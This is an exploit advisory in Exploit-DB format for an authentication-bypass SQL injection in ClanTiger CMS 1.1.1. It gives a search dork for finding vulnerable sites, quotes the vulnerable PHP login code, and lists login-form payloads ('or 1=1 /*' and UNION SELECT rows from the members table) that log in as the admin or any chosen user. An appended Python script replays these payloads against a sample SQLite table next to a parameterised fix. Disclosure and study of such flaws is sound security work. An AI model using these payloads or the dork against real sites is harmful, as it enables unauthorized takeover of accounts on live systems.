ClanTiger <= 1.1.1 Auth Bypass SQL Injection Vulnerability

2009-04-17T00:00:00
ID EDB-ID:8472
Type exploitdb
Reporter YEnH4ckEr
Modified 2009-04-17T00:00:00

Description

ClanTiger <= 1.1.1 (Auth Bypass) SQL Injection Vulnerability. Webapps exploit for php platform

                                        
***********************************************************************************************
***********************************************************************************************
**                                                                                           **
**                                                                                           **
**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
**     || || ||  []        [][]   []   []  []     []   []      [] []   []        []    []    **
   [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
**                                                                                           **
**                                                                                           **
**                   LONG LIVE SPAIN!... WE WILL WIN THE WORLD CUP!... o.O                   **
**                                   PROUD TO BE SPANISH!                                    **
**                                                                                           **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|                           AUTH BYPASS LOGIN FORM (SQL INJECTION)                           |
|--------------------------------------------------------------------------------------------|
|                                     | CLAN TIGER CMS |                                     |
|  CMS INFORMATION:                    ----------------                                      |
|                                                                                            |
|-->WEB: http://www.clantiger.com                                                            |
|-->DOWNLOAD: http://www.clantiger.com/download-clan-cms                                     |
|-->DEMO: http://www.demo.clantiger.com/                                                     |
|-->CATEGORY: CMS / Portals                                                                  |
|-->DESCRIPTION: ClanTiger is a content management system specifically designed for gaming   |
|                clans...                                                                    |
|                                                                                            |
|  CMS VULNERABILITY:                                                                        |
|                                                                                            |
|-->TESTED ON: Firefox 2.0.0.20 and IE 7.0.5730 (Default)                                    |
|-->DORK: "Powered by ClanTiger"                                                             |
|-->CATEGORY: SQL INJECTION / AUTH BYPASS                                                    |
|-->AFFECTED VERSIONS: 1.1.1 (latest) and 1.1                                                |
|-->Discovered bug date: 2009-04-11                                                          |
|-->Reported bug date: 2009-04-11                                                            |
|-->Fixed bug date: Not fixed                                                                |
|-->Info patch (????): Not fixed                                                             |
|-->Author: YEnH4ckEr                                                                        |
|-->mail: y3nh4ck3r[at]gmail[dot]com                                                         |
|-->WEB/BLOG: N/A                                                                            |
|-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD)    |
|            for their support.                                                              |
----------------------------------------------------------------------------------------------

-----------
BUG FILE:
-----------

Path --> [HOME_PATH]/module/login.php

It contains:

	function authenticate()
	{
		// the $_POST values are handed over untouched: nothing escapes a quote in 'email'
		$authentication = $this->access->authenticate($_POST['email'],$_POST['password'],(bool) $_POST['stayLogged']);
		if($authentication === true)
		{
			header('Location: index.php?info=hasLoggedIn');
			exit;
		}

		// we couldn't log in
		$this->errorMessages[] = $authentication;
		$this->main();
	}

Path --> [HOME_PATH]/function/class.accesscontrol.php

It contains:

	public function authenticate($email,$password,$stayAuthed=false)
	{
		if($stayAuthed) $logintime = time() + (3600*24*356*3);
		else $logintime = time() + 3600;

		// attempt to get the user from the database
		include ROOTPATH . 'base/class.user.php';
		$user = new User;
		$user->email = $email;             // raw attacker-controlled string
		$user->password = md5($password);  // only the password is hashed
		$user->getBy(array('email','password')); // builds the WHERE clause from both fields
		...
	}

------------
CONDITIONS:
------------

** magic_quotes_gpc = Off (with it On the single quote in the e-mail field arrives escaped as \' and the injection fails)

----------------------------------
PROOF OF CONCEPT (SQL INJECTION):
----------------------------------

[HOME_PATH]/index.php?module=login

login form:

e-mail value: something' [SQL]
password value: anything (it is md5()'d and placed in the query, but the comment sequence
                          in the e-mail payload cuts the password condition off)

---------
EXAMPLE:
---------

login post form:

e-mail value: something' or 1=1 /* --> every row matches, the first one (the admin) is logged in!
e-mail value: something' or 1   #  --> same thing, using MySQL's "#" comment instead of "/*"

Note: for the UNION payloads we need DB_PREFIX (default: "", others: db_, clan_, etc.); with a
non-empty prefix the table name is <prefix>members.

e-mail value: something' AND 0 UNION ALL SELECT * FROM members WHERE id=1 /*  --> admin (if admin is id=1)!
e-mail value: something' AND 0 UNION ALL SELECT * FROM members WHERE id=12 /* --> we are user id=12!
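As an added example (not part of this advisory and not ClanTiger's own code), the following
Python script rebuilds the query shape the concatenating getBy() call is assumed to produce
against an in-memory SQLite table, runs the payloads above through it, and puts the
parameterised form beside it. The `members` columns, the sample rows and the exact query text
are constructed for the example; SQLite accepts the unterminated "/*" comment the same way
MySQL does, while the "#" variant is MySQL-only and is left out.

```python
"""Added example (not ClanTiger code): the injection pattern from the advisory
reproduced against an in-memory SQLite table, next to the fixed form."""
import hashlib
import sqlite3

# Constructed sample data standing in for ClanTiger's `members` table. The
# column names and the query shape are assumptions for this example only.
MEMBERS = [
    (1, "admin@example.com", hashlib.md5(b"s3cret").hexdigest(), "admin"),
    (2, "alice@example.com", hashlib.md5(b"hunter2").hexdigest(), "member"),
    (12, "mallory@example.com", hashlib.md5(b"pw12").hexdigest(), "member"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, email TEXT, "
               "password TEXT, role TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?, ?, ?)", MEMBERS)
    return db


def build_vulnerable_query(email, password):
    """The concatenating getBy(array('email','password')) pattern: the e-mail
    goes into the WHERE clause verbatim, only the password is md5-hashed."""
    return ("SELECT * FROM members WHERE email='%s' AND password='%s'"
            % (email, hashlib.md5(password.encode()).hexdigest()))


def vulnerable_login(db, email, password):
    # Returns the first matching (id, email, md5, role) row, or None.
    return db.execute(build_vulnerable_query(email, password)).fetchone()


def safe_login(db, email, password):
    """Hardened form: bound parameters keep the quote inside the value, so the
    e-mail field can never change the statement."""
    return db.execute(
        "SELECT * FROM members WHERE email=? AND password=?",
        (email, hashlib.md5(password.encode()).hexdigest()),
    ).fetchone()


# The advisory's payloads. An unterminated "/*" swallows the rest of the
# statement, including the AND password='...' condition.
PAYLOADS = {
    "or_1=1": "something' or 1=1 /*",
    "union_id1": "something' AND 0 UNION ALL SELECT * FROM members WHERE id=1 /*",
    "union_id12": "something' AND 0 UNION ALL SELECT * FROM members WHERE id=12 /*",
}


def run_payloads():
    """Returns {name: (id logged in via the vulnerable query, row via the safe one)}."""
    db = make_db()
    results = {}
    for name, email in PAYLOADS.items():
        row = vulnerable_login(db, email, "anything")
        results[name] = (row[0] if row else None, safe_login(db, email, "anything"))
    return results


if __name__ == "__main__":
    for name, email in PAYLOADS.items():
        print(name, "=>", build_vulnerable_query(email, "anything"))
    for name, (uid, safe) in run_payloads().items():
        print("%-11s vulnerable -> id %s   parameterised -> %s" % (name, uid, safe))
```

Running it prints the three rewritten statements, which makes visible why the password is
irrelevant: everything after "/*" is comment. The "or 1=1" payload logs in whichever row the
database returns first, which is why the advisory can only promise "admin" when the admin is
the first (id=1) row; the UNION payloads pick the victim row explicitly and do not depend on that.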

*******************************************************************
 SPECIAL THANKS TO: Str0ke and every H4ck3r (all who make milw0rm)!
*******************************************************************
-------------------------------------------------------------------
*******************************************************************
 GREETZ TO: JosS and all spanish Hack3Rs community!
*******************************************************************

-------------------EOF---------------------------------->>>ENJOY IT!

# milw0rm.com [2009-04-17]